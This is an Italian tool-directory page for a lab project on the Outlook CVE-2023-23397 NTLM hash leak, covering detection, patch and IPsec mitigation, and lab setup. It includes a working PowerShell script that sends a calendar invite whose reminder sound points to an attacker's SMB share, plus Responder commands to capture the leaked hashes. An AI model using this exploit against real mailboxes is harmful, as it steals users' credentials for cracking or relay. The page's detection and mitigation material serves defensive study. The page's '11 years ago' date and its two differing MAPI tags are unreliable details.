Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-23397 — Dimostrazione della vulnerabilità CVE-2023-23397 di escalation dei privilegi in Outlook | Kitploit
Strumenti/GitHubGitHub/gilospy/cve-2023-23397
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubgilospy/cve-2023-23397

CVE-2023-23397

Dimostrazione della vulnerabilità CVE-2023-23397 di escalation dei privilegi in Outlook

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-23397: Demo di Sfruttamento e Mitigazione

📌 Panoramica

Questo progetto dimostra il rilevamento, lo sfruttamento e la mitigazione di CVE-2023-23397, una vulnerabilità critica di relay NTLM zero-click in Microsoft Outlook per Windows. Sfruttata tramite inviti del calendario, questa vulnerabilità consente agli aggressori di catturare hash NTLMv2 senza alcuna interazione da parte dell'utente.

🛡️ Punteggio CVSS: 9.8 (Critico)
🖥️ Versioni Interessate: Outlook 2013, 2016, 2019, Microsoft 365 (prima della patch del 14 marzo 2023)


⚠️ Dettagli della Vulnerabilità

I promemoria del calendario di Outlook possono essere configurati per riprodurre suoni personalizzati tramite la proprietà MAPI PidLidReminderFileParameter. Outlook non valida i percorsi UNC, consentendo richieste SMB remote quando i promemoria vengono attivati.

root@kitploit:~
\\attacker-ip\share\sound.wav

Ciò comporta l'invio di hash NTLMv2 a server controllati dall'aggressore, che possono quindi:

  • Essere decifrati offline (recupero password)
  • Essere utilizzati in attacchi di relay NTLM per l'escalation dei privilegi

🔍 Metodo di Rilevamento

Utilizzare MFCMAPI per ispezionare gli elementi del calendario e verificare la presenza di valori dannosi in PidLidReminderFileParameter (tag MAPI 0x851F001F).

Passaggi:

  1. Aprire MFCMAPI → QuickStart > Open Folder > Calendar
  2. Andare su Table > Set Columns
  3. Aggiungere il tag proprietà 0x808A001F per visualizzare i percorsi dei file dei promemoria
  4. Cercare percorsi UNC come indicatore di compromissione

🛠️ Tecniche di Mitigazione

1. Applicare la Patch Microsoft (Consigliato)

Installare la patch del 14 marzo 2023 (ad es., KB5002044). La patch introduce:

  • IsFileZoneLocalIntranetOrTrusted() per validare i percorsi dei file dei promemoria
  • Opzioni dei Criteri di gruppo per definire i domini attendibili

Risultato del Test:
Outlook registrerà Event ID 1008 e bloccherà l'accesso ai percorsi SMB non attendibili.


2. Mitigazione a Livello di Rete IPsec (Temporanea)

a. Blocca Tutto il Traffico SMB

  • Blocca il TCP 445 in uscita (SMB)
  • Impedisce la divulgazione di NTLM verso reti non attendibili

b. Consenti Solo IP Attendibili

  • Definire gli IP interni (ad es., 192.168.1.0/24)
  • Mantenere la continuità operativa per l'uso interno di SMB

📂 Policy preconfigurata: OutlookMitigation.ipsec


💻 Configurazione del Progetto

Ambiente

SistemaNome UtentePassword
Kali Linuxkalikali
VM Windows 10CVE-2023-23397vbox@123
Account Emailvictim​@exploit.comvbox@123

Attaccante (Kali Linux)

root@kitploit:~
sudo apt install responder
sudo responder -I eth0 -v

Assicurarsi che Kali e la VM vittima siano sulla stessa rete.


Vittima (Windows + Outlook 2013)

  1. Installare:

    • Outlook 2013
    • .NET 2.0
    • hMailServer
    • MFCMAPI
  2. Configurazione:

    • Dominio hMailServer: exploit.com
    • Utente email: [email protected]

🚨 Sfruttamento (Script PowerShell)

root@kitploit:~
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("[email protected]")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

Responder catturerà l'hash NTLMv2 dal sistema vittima.


✅ Verifica

Rilevamento

  • Utilizzare MFCMAPI per confermare che PidLidReminderFileParameter contenga un percorso UNC.

Mitigazione

  • Applicare la patch o la policy IPsec.
  • Eseguire nuovamente lo script: Outlook potrebbe mostrare un promemoria ma non dovrebbe essere catturato alcun hash NTLM.

❗ Limitazioni

  • Bloccare tutto il traffico SMB può influire sui servizi legittimi (condivisione file, autenticazione di dominio)
  • Mantenere gli IP attendibili può diventare operativamente complesso

Scarica lo strumento